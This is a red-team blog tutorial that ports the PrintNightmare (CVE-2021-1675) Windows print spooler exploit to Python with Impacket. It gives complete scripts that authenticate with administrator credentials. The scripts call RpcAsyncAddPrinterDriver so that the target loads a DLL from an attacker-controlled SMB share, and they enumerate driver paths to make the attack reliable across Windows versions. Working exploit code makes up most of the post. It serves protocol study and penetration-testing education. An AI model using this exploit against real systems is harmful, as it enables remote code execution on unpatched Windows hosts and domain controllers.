Red Teaming
cube0x0,
Aug 13
2021
Today, we're going to take a deep dive into pentesting and exploitation tool development using Impacket Loading Preview...
So what is Impacket? Impacket was originally created by Core Security Technologies (@agsolino Loading Preview... Loading Preview...
As a demonstration of how to communicate with Windows protocols and porting an exploit from scratch with the module, let’s port the PrintNightmare Loading Preview... Loading Preview... Loading Preview...
We'll start by inspecting the code in PrintNightmare. At the beginning of the code in POC.cpp, we see that a handle is created with the CreateBindingHandle function. If we look at what the function does we see that it binds to the RPC UUID 12345678-1234-abcd-ef00-0123456789ab, which we can look up here Loading Preview... Loading Preview...
status = RpcStringBindingComposeW((RPC_WSTR)L"12345678-1234-abcd-ef00-0123456789ab", (RPC_WSTR)L"ncacn_ip_tcp",
(RPC_WSTR)dc_ip, NULL, nullptr, &StringBinding);
Both MS-RPRN Loading Preview... Loading Preview... Loading Preview... Loading Preview...
Returning to POC.cpp, we see that after a handle is created, it then creates a DRIVER_INFO_2 Loading Preview... Loading Preview...
DRIVER_INFO_2 info;
info.cVersion = 3;
info.pConfigFile = (LPWSTR)L"C:\\Windows\\System32\\kernelbase.dll";
info.pDataFile = src_exp_path;
info.pDriverPath = (LPWSTR)L"C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL";
info.pEnvironment = (LPWSTR)L"Windows x64";
info.pName = (LPWSTR)L"123";
DRIVER_CONTAINER container_info;
container_info.Level = 2;
container_info.DriverInfo.Level2 = new DRIVER_INFO_2();
container_info.DriverInfo.Level2->cVersion = 3;
container_info.DriverInfo.Level2->pConfigFile = info.pConfigFile;
container_info.DriverInfo.Level2->pDataFile = info.pDataFile;
container_info.DriverInfo.Level2->pDriverPath = info.pDriverPath;
container_info.DriverInfo.Level2->pEnvironment = info.pEnvironment;
container_info.DriverInfo.Level2->pName = info.pName;
We'll need to re-create both of these structures in Impacket. DRIVER_INFO_2 is a basic NDR Structure, but DRIVER_CONTAINER is an NDR Union Structure, so we'll have to process the driver_container through it. Impacket has implemented the NDR Constructed Data Types as defined by C706 - Transfer Syntax NDR Loading Preview... Loading Preview... Loading Preview... Loading Preview... Loading Preview...
# 2.2.1.5.2 DRIVER_INFO_2
class DRIVER_INFO_2(NDRSTRUCT):
structure = (
('cVersion', DWORD),
('pName', LPWSTR),
('pEnvironment', LPWSTR),
('pDriverPath', LPWSTR),
('pDataFile', LPWSTR),
('pConfigFile', LPWSTR),
)
class PDRIVER_INFO_2(NDRPOINTER):
referent = (
('Data', DRIVER_INFO_2),
)
# 2.2.1.2.3 DRIVER_CONTAINER
class DRIVER_INFO_UNION(NDRUNION):
commonHdr = (
('tag', ULONG),
)
union = {
2 : ('Level2', PDRIVER_INFO_2),
}
class DRIVER_CONTAINER(NDRSTRUCT):
structure = (
('Level', DWORD),
('DriverInfo', DRIVER_INFO_UNION),
)
When all the Structures have been created in Impacket, we can move on in POC.cpp and see that the RpcAddPrinterDriverEx method is called next, which in MS-PAR is named RpcAsyncAddPrinterDriver Loading Preview...
DWORD hr = RpcAddPrinterDriverEx(handle,
dc_path,
&container_info,
APD_COPY_ALL_FILES | 0x10 | 0x8000
);
To implement RPC Interface methods in Impacket we need to add all the parameters to an NDRCALL class that matches the ins, the outs, and the input type. Methods of protocols that are built on top of MS-RPCE could ask for the [in] handle_t hRemoteBinding parameter but the MS-RPCE implementation in Impacket is created in such a way so that the parameter does not need to be manually specified. All NDRCALL functions in Impacket have two classes; a request class, and a response class. The response class is automatically called here Loading Preview...
The input types for this case are based on the MS-DTYP data typeset and can be found in dtypes.py Loading Preview...
# 3.1.4.2.2 RpcAsyncAddPrinterDriver (Opnum 39)
class RpcAsyncAddPrinterDriver(NDRCALL):
opnum = 39
structure = (
('pName', LPWSTR),
('pDriverContainer', DRIVER_CONTAINER),
('dwFileCopyFlags', DWORD),
)
class RpcAsyncAddPrinterDriverResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
Before calling the method we need to collect the Flags Loading Preview...
# 3.1.4.4.8 dwFileCopyFlags Values
APD_STRICT_UPGRADE = 0x00000001
APD_STRICT_DOWNGRADE = 0x00000002
APD_COPY_ALL_FILES = 0x00000004
APD_COPY_NEW_FILES = 0x00000008
APD_COPY_FROM_DIRECTORY = 0x00000010
APD_DONT_COPY_FILES_TO_CLUSTER = 0x00001000
APD_COPY_TO_ALL_SPOOLERS = 0x00002000
APD_INSTALL_WARNED_DRIVER = 0x00008000
APD_RETURN_BLOCKING_STATUS_CODE = 0x00010000
Now we can start constructing our packages. Strings require null termination which means that the string must end with \x00
# Create values for function parameter value
pDriverContainer = DRIVER_CONTAINER()
pDriverContainer['Level'] = 2
pDriverContainer['DriverInfo']['tag'] = 2
pDriverContainer['DriverInfo']['Level2']['cVersion'] = 3
pDriverContainer['DriverInfo']['Level2']['pName'] = "1234\x00"
pDriverContainer['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
pDriverContainer['DriverInfo']['Level2']['pDriverPath'] = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\x00"
pDriverContainer['DriverInfo']['Level2']['pDataFile'] = "\\??\\UNC\\192.168.1.215\\smb\\addCube.dll\x00"
pDriverContainer['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\winhttp.dll\x00"
dwFileCopyFlags = APD_COPY_ALL_FILES | 0x10 | 0x8000
pName = NULL
# Create package for RpcAsyncAddPrinterDriver function
request = RpcAsyncAddPrinterDriver()
request['pName'] = pName
request['pDriverContainer'] = pDriverContainer
request['dwFileCopyFlags'] = dwFileCopyFlags
Impacket requires a DCERPCSessionError class in __main__, if we skip this in our RPC protocol implementation we will not be able to parse any error response.
from impacket import system_errors
from impacket.dcerpc.v5.rpcrt import DCERPCException
class DCERPCSessionError(DCERPCException):
def __init__(self, error_string=None, error_code=None, packet=None):
DCERPCException.__init__(self, error_string, error_code, packet)
def __str__( self ):
key = self.error_code
if key in system_errors.ERROR_MESSAGES:
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
return 'PAR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
else:
return 'PAR SessionError: unknown error code: 0x%x' % self.error_code
Before creating a binding to the MS-PAR endpoint, we need to read the Client Initialization Documentation Loading Preview... Loading Preview... Loading Preview...
#UUID's
MSRPC_UUID_PAR = uuidtup_to_bin(('76F03F96-CDFD-44FC-A22C-64950A001209', '1.0'))
MSRPC_UUID_WINSPOOL = string_to_bin('9940CA8E-512F-4C58-88A9-61098D6896BD')
We can use epm.hept_map to get a string binding for the MS-PAR endpoint using the ncacn_ip_tcp protocol, which is fine for RPC. Then we can create a DCE object with DCERPCTransportFactory, set credentials, set auth_level to the level described in the documentation, connect, and then bind to the MS-PAR endpoint.
# Create binding
stringbinding = epm.hept_map("192.168.1.10", MSRPC_UUID_PAR, protocol='ncacn_ip_tcp')
rpctransport = DCERPCTransportFactory(stringbinding)
rpctransport.set_credentials("administrator", "Password123!", "", "", "")
dce = rpctransport.get_dce_rpc()
dce.set_auth_level(rpcrt.RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.connect()
dce.bind(MSRPC_UUID_PAR)
With the packages fully constructed, we can now attempt to make a request. ErrorCode 0 means success.
# print request, make request and print response
request.dump()
resp = dce.request(request, MSRPC_UUID_WINSPOOL)
resp.dump()
#!/usr/bin/python3
from impacket.dcerpc.v5 import par, rpcrt, epm
from impacket.dcerpc.v5.transport import DCERPCTransportFactory
from impacket.dcerpc.v5.dtypes import ULONGLONG, UINT, USHORT, LPWSTR, DWORD, ULONG, NULL
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRUNION, NDRPOINTER, NDRUniConformantArray
from impacket.uuid import uuidtup_to_bin, string_to_bin
from impacket import system_errors
from impacket.dcerpc.v5.rpcrt import DCERPCException
class DCERPCSessionError(DCERPCException):
def __init__(self, error_string=None, error_code=None, packet=None):
DCERPCException.__init__(self, error_string, error_code, packet)
def __str__( self ):
key = self.error_code
if key in system_errors.ERROR_MESSAGES:
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
return 'PAR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
else:
return 'PAR SessionError: unknown error code: 0x%x' % self.error_code
#UUID's
MSRPC_UUID_PAR = uuidtup_to_bin(('76F03F96-CDFD-44FC-A22C-64950A001209', '1.0'))
MSRPC_UUID_WINSPOOL = string_to_bin('9940CA8E-512F-4C58-88A9-61098D6896BD')
# 3.1.4.4.8 RpcAddPrinterDriverEx Values
APD_STRICT_UPGRADE = 0x00000001
APD_STRICT_DOWNGRADE = 0x00000002
APD_COPY_ALL_FILES = 0x00000004
APD_COPY_NEW_FILES = 0x00000008
APD_COPY_FROM_DIRECTORY = 0x00000010
APD_DONT_COPY_FILES_TO_CLUSTER = 0x00001000
APD_COPY_TO_ALL_SPOOLERS = 0x00002000
APD_INSTALL_WARNED_DRIVER = 0x00008000
APD_RETURN_BLOCKING_STATUS_CODE = 0x00010000
# 2.2.1.5.2 DRIVER_INFO_2
class DRIVER_INFO_2(NDRSTRUCT):
structure = (
('cVersion', DWORD),
('pName', LPWSTR),
('pEnvironment', LPWSTR),
('pDriverPath', LPWSTR),
('pDataFile', LPWSTR),
('pConfigFile', LPWSTR),
)
class PDRIVER_INFO_2(NDRPOINTER):
referent = (
('Data', DRIVER_INFO_2),
)
# 2.2.1.2.3 DRIVER_CONTAINER
class DRIVER_INFO_UNION(NDRUNION):
commonHdr = (
('tag', ULONG),
)
union = {
2 : ('Level2', PDRIVER_INFO_2),
}
class DRIVER_CONTAINER(NDRSTRUCT):
structure = (
('Level', DWORD),
('DriverInfo', DRIVER_INFO_UNION),
)
# 3.1.4.2.2 RpcAsyncAddPrinterDriver (Opnum 39)
class RpcAsyncAddPrinterDriver(NDRCALL):
opnum = 39
structure = (
('pName', LPWSTR),
('pDriverContainer', DRIVER_CONTAINER),
('dwFileCopyFlags', DWORD),
)
class RpcAsyncAddPrinterDriverResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
# Create values for function parameter value
pDriverContainer = DRIVER_CONTAINER()
pDriverContainer['Level'] = 2
pDriverContainer['DriverInfo']['tag'] = 2
pDriverContainer['DriverInfo']['Level2']['cVersion'] = 3
pDriverContainer['DriverInfo']['Level2']['pName'] = "1234\x00"
pDriverContainer['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
pDriverContainer['DriverInfo']['Level2']['pDriverPath'] = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\x00"
pDriverContainer['DriverInfo']['Level2']['pDataFile'] = "\\??\\UNC\\192.168.1.215\\smb\\addCube.dll\x00"
pDriverContainer['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\winhttp.dll\x00"
dwFileCopyFlags = APD_COPY_ALL_FILES | 0x10 | 0x8000
pName = NULL
# Create package for RpcAsyncAddPrinterDriver function
request = RpcAsyncAddPrinterDriver()
request['pName'] = pName
request['pDriverContainer'] = pDriverContainer
request['dwFileCopyFlags'] = dwFileCopyFlags
# Create binding
stringbinding = epm.hept_map("192.168.1.10", MSRPC_UUID_PAR, protocol='ncacn_ip_tcp')
rpctransport = DCERPCTransportFactory(stringbinding)
rpctransport.set_credentials("administrator", "Password123!", "", "", "")
dce = rpctransport.get_dce_rpc()
dce.set_auth_level(rpcrt.RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.connect()
dce.bind(MSRPC_UUID_PAR)
# print request, make request and print response
request.dump()
resp = dce.request(request, MSRPC_UUID_WINSPOOL)
resp.dump()
The problem with the original PrintNightmare PoC was that the pDriverPath value was hardcoded and that the path tends to be different on different versions of Windows. To solve this issue and to enumerate driver paths remotely we can use the RpcAsyncEnumPrinterDrivers Loading Preview...
Starting with the methods, we can perform the same process as before. The opnum specified in our method must match the opnum in the Microsoft documentation since it will be included in the package.
# 3.1.4.2.3 RpcAsyncEnumPrinterDrivers (Opnum 40)
class RpcAsyncEnumPrinterDrivers(NDRCALL):
opnum = 40
structure = (
('pName', LPWSTR),
('pEnvironment', LPWSTR),
('Level', DWORD),
('pDrivers', LPBYTE),
('cbBuf', DWORD),
)
class RpcAsyncEnumPrinterDriversResponse(NDRCALL):
structure = (
('pDrivers', LPBYTE),
('pcbNeeded', DWORD),
('pcReturned', DWORD),
('ErrorCode', ULONG),
)
Now to make the request. First, we need to make a request to identify the required buffer size, and then we can obtain the printer driver data.
# Create values for function parameter value
pName = NULL
pEnvironment = NULL
Level = 2
pDrivers = NULL
cbBuf = 0
# get value for cbBuf
request = RpcAsyncEnumPrinterDrivers()
request['pName'] = pName
request['pEnvironment'] = pEnvironment
request['Level'] = Level
request['pDrivers'] = pDrivers
request['cbBuf'] = cbBuf
try:
dce.request(request, MSRPC_UUID_WINSPOOL)
except DCERPCSessionError as e:
if str(e).find('ERROR_INSUFFICIENT_BUFFER') < 0:
raise
bytesNeeded = e.get_packet()['pcbNeeded']
print("bytesNeeded: {0}".format(bytesNeeded))
# do RpcEnumPrinterDrivers again with the correct buffer size
request = RpcAsyncEnumPrinterDrivers()
request['pName'] = pName
request['pEnvironment'] = pEnvironment
request['Level'] = Level
request['pDrivers'] = b'a' * bytesNeeded
request['cbBuf'] = bytesNeeded
request.dump()
resp = dce.request(request, MSRPC_UUID_WINSPOOL)
resp.dump()
The output from resp.dump() contains our expected return structure. pcReturned tells us how many drivers are installed and pDrivers is a long array of bytes that we need to convert into a _DRIVER_INFO_2 Loading Preview...
When parsing binary data for Windows structures we can use the Impacket class Structure. Each offset is a little-endian ordered long(32 bit) so in our structure, we can use <L to automatically parse the first 6*32 bits of each driver. Then we can use the fromString function to collect the driver data between the offsets, this function will be automatically called when a new class is created.
class DRIVER_INFO_2_BLOB(Structure):
structure = (
('cVersion', '<L'),
('NameOffset', '<L'),
('EnvironmentOffset', '<L'),
('DriverPathOffset', '<L'),
('DataFileOffset', '<L'),
('ConfigFileOffset', '<L'),
)
def __init__(self, data = None):
Structure.__init__(self, data = data)
def fromString(self, data):
Structure.fromString(self, data)
self['ConfigFileArray'] = self.rawData[self['ConfigFileOffset']:self['DataFileOffset']].decode('utf-16-le')
self['DataFileArray'] = self.rawData[self['DataFileOffset']:self['DriverPathOffset']].decode('utf-16-le')
self['DriverPathArray'] = self.rawData[self['DriverPathOffset']:self['EnvironmentOffset']].decode('utf-16-le')
self['EnvironmentArray'] = self.rawData[self['EnvironmentOffset']:self['NameOffset']].decode('utf-16-le')
#self['NameArray'] = self.rawData[self['NameOffset']+offset:len(self.rawData)].decode('utf-16-le')
class DRIVER_INFO_2_ARRAY(Structure):
#pcReturned is how many drivers that exists
def __init__(self, data = None, pcReturned = None):
Structure.__init__(self, data = data)
self['drivers'] = list()
remaining = data
if data is not None:
for i in range(pcReturned):
#save driver data to attr
attr = DRIVER_INFO_2_BLOB(remaining)
self['drivers'].append(attr)
#move to next driver
remaining = remaining[len(attr):]
To call the parser we can do this:
blobs = DRIVER_INFO_2_ARRAY(b''.join(resp['pDrivers']), resp['pcReturned'])
for i in blobs['drivers']:
i.dump()
Full example code:
#!/usr/bin/python3
from impacket.dcerpc.v5 import par, rpcrt, epm
from impacket.dcerpc.v5.transport import DCERPCTransportFactory
from impacket.structure import Structure
from impacket.dcerpc.v5.dtypes import ULONGLONG, UINT, USHORT, LPWSTR, DWORD, ULONG, NULL, LPBYTE
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRUNION, NDRPOINTER, NDRUniConformantArray
from impacket.uuid import uuidtup_to_bin, string_to_bin
from impacket import system_errors
from impacket.dcerpc.v5.rpcrt import DCERPCException
class DCERPCSessionError(DCERPCException):
def __init__(self, error_string=None, error_code=None, packet=None):
DCERPCException.__init__(self, error_string, error_code, packet)
def __str__( self ):
key = self.error_code
if key in system_errors.ERROR_MESSAGES:
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
return 'PAR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
else:
return 'PAR SessionError: unknown error code: 0x%x' % self.error_code
#UUID's
MSRPC_UUID_PAR = uuidtup_to_bin(('76F03F96-CDFD-44FC-A22C-64950A001209', '1.0'))
MSRPC_UUID_WINSPOOL = string_to_bin('9940CA8E-512F-4C58-88A9-61098D6896BD')
# Create binding
stringbinding = epm.hept_map("192.168.1.10", MSRPC_UUID_PAR, protocol='ncacn_ip_tcp')
rpctransport = DCERPCTransportFactory(stringbinding)
rpctransport.set_credentials("administrator", "Password123!", "", "", "")
dce = rpctransport.get_dce_rpc()
dce.set_auth_level(rpcrt.RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.connect()
dce.bind(MSRPC_UUID_PAR)
#enum
# 3.1.4.2.3 RpcAsyncEnumPrinterDrivers (Opnum 40)
class RpcAsyncEnumPrinterDrivers(NDRCALL):
opnum = 40
structure = (
('pName', LPWSTR),
('pEnvironment', LPWSTR),
('Level', DWORD),
('pDrivers', LPBYTE),
('cbBuf', DWORD),
)
class RpcAsyncEnumPrinterDriversResponse(NDRCALL):
structure = (
('pDrivers', LPBYTE),
('pcbNeeded', DWORD),
('pcReturned', DWORD),
('ErrorCode', ULONG),
)
# Create values for function parameter value
pName = NULL
pEnvironment = NULL
Level = 2
pDrivers = NULL
cbBuf = 0
# get value for cbBuf
request = RpcAsyncEnumPrinterDrivers()
request['pName'] = pName
request['pEnvironment'] = pEnvironment
request['Level'] = Level
request['pDrivers'] = pDrivers
request['cbBuf'] = cbBuf
try:
dce.request(request, MSRPC_UUID_WINSPOOL)
except DCERPCSessionError as e:
if str(e).find('ERROR_INSUFFICIENT_BUFFER') < 0:
raise
bytesNeeded = e.get_packet()['pcbNeeded']
print("bytesNeeded: {0}".format(bytesNeeded))
# now do RpcEnumPrinterDrivers again
request = RpcAsyncEnumPrinterDrivers()
request['pName'] = pName
request['pEnvironment'] = pEnvironment
request['Level'] = Level
request['pDrivers'] = b'a' * bytesNeeded
request['cbBuf'] = bytesNeeded
request.dump()
resp = dce.request(request, MSRPC_UUID_WINSPOOL)
resp.dump()
class DRIVER_INFO_2_BLOB(Structure):
structure = (
('cVersion', '<L'),
('NameOffset', '<L'),
('EnvironmentOffset', '<L'),
('DriverPathOffset', '<L'),
('DataFileOffset', '<L'),
('ConfigFileOffset', '<L'),
)
def __init__(self, data = None):
Structure.__init__(self, data = data)
def fromString(self, data):
Structure.fromString(self, data)
self['ConfigFileArray'] = self.rawData[self['ConfigFileOffset']:self['DataFileOffset']].decode('utf-16-le')
self['DataFileArray'] = self.rawData[self['DataFileOffset']:self['DriverPathOffset']].decode('utf-16-le')
self['DriverPathArray'] = self.rawData[self['DriverPathOffset']:self['EnvironmentOffset']].decode('utf-16-le')
self['EnvironmentArray'] = self.rawData[self['EnvironmentOffset']:self['NameOffset']].decode('utf-16-le')
#self['NameArray'] = self.rawData[self['NameOffset']+offset:len(self.rawData)].decode('utf-16-le')
class DRIVER_INFO_2_ARRAY(Structure):
def __init__(self, data = None, pcReturned = None):
Structure.__init__(self, data = data)
self['drivers'] = list()
remaining = data
if data is not None:
for i in range(pcReturned):
attr = DRIVER_INFO_2_BLOB(remaining)
self['drivers'].append(attr)
remaining = remaining[len(attr):]
blobs = DRIVER_INFO_2_ARRAY(b''.join(resp['pDrivers']), resp['pcReturned'])
for i in blobs['drivers']:
i.dump()
The full exploit code is available at https://github.com/cube0x0/CVE-2021-1675/blob/main/SharpPrintNightmare/CVE-2021-1675.py Loading Preview...
Many thanks to @agsolino Loading Preview... Loading Preview...